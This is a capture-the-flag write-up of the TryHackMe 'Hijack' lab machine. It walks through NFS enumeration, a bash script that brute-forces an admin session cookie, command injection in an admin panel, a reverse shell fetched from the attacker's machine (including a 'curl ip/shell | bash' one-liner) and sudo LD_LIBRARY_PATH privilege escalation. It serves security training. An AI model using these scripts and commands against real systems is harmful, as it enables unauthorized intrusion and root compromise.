🎃Hijack

Misconfigs conquered, identities claimed.

Enumeration

We are working with a Linux box

FTP, SSH, HTTP are open and we probably have a nfs share to mount

We can indeed mount a share

I tried mounting it but i cannot list files it's giving permission denied...

I tried looking at the webserver

Basic page with a login and sign up functionality

I tried logging in with admin:admin and it says that the password is not correct

If i put a different user we can see that the error is different

We can probably enumerate registered users and may be useful later...

I registered a user but the page does not have any features whatsoever

We only have Administration to click but we are not Admin right now

After messing around with the webpage and not finding anything i decided to look at the nfs share again

Instead of mounting /mnt/share i mounted only /mnt

The share folder is only accessible by a user with uid and gid of 1003

I didn't want to create a new user because i was not using a VM so i found this tool

This thing is 10 years old and it does not compile on newer versions of ubuntu, so for this task i used THM's attackbox

This files gives credentials for the ftpuser

Now we can login with ftp

We have a password list with 150 random strings and a message from the admin

We spot a potential user: rick

Web exploitation

It tried bruteforcing the login page but after 5 tries the account gets locked

After clicking on the session cookie on burpsuite i saw that the it's probably easily guessable, the format is username:MD5 hashed password

So i created a bash script to "bruteforce" the session cookie targeting the admin user

#!/bin/bash

filename="passwords_list.txt"
md5=""
response="denied"
base_cookie="admin:"

# Loop until the response is different that the usual one
while [ "$response" = "denied" ]
do
    while IFS= read -r line
    do
        md5=$(echo -n "$line" | md5sum | awk '{ print $1 }')
        
        # Cookie encoding
        cookie=$(echo -n "$base_cookie$md5" | base64)

        # Verbosity
        echo "Processing line: $line"
        echo "MD5 hash: $md5"
        echo "PHPSESSID cookie: $cookie"

        response=$(curl -s -b "PHPSESSID=$cookie" "http://10.10.23.221/administration.php")
        echo "Response: $response"

        # Breaking the loop
        if [[ $response != *denied* ]]; then
            break
        fi

        echo "-----------------------------"
    done < "$filename"
done

We got a valid cookie

Now we can place it in the browser

Here is the administration panel

If we put a service that is running like apache2 this is the response

It's definitely executing something like systemctl status service.name

We can try to inject commands

Some easy injections do not work

After some trial and error i found that this worked

To get a reverse shell i downloaded one from my machine and then simply executed it

It's not possible to curl it and then pipe to bash, curl ip/shell | bash because that triggers the command injection block

Privilege Escalation

Now we are www-data

In the webroot we spot a config.phpfile that contains credentials for the mysqlinstance

In the mysql db we can also find the Admin's hashed password and it's possible to crack it with the password list provided, it's not useful just for fun since we already have access to the admin panel

With these credentials we can login with ssh

With sudo -l we immediately see a privesc vector

This is similar to the LD_PRELOAD privesc but using LD_LIBRARY_PATH

Simply after following the instructions on the article we have root privileges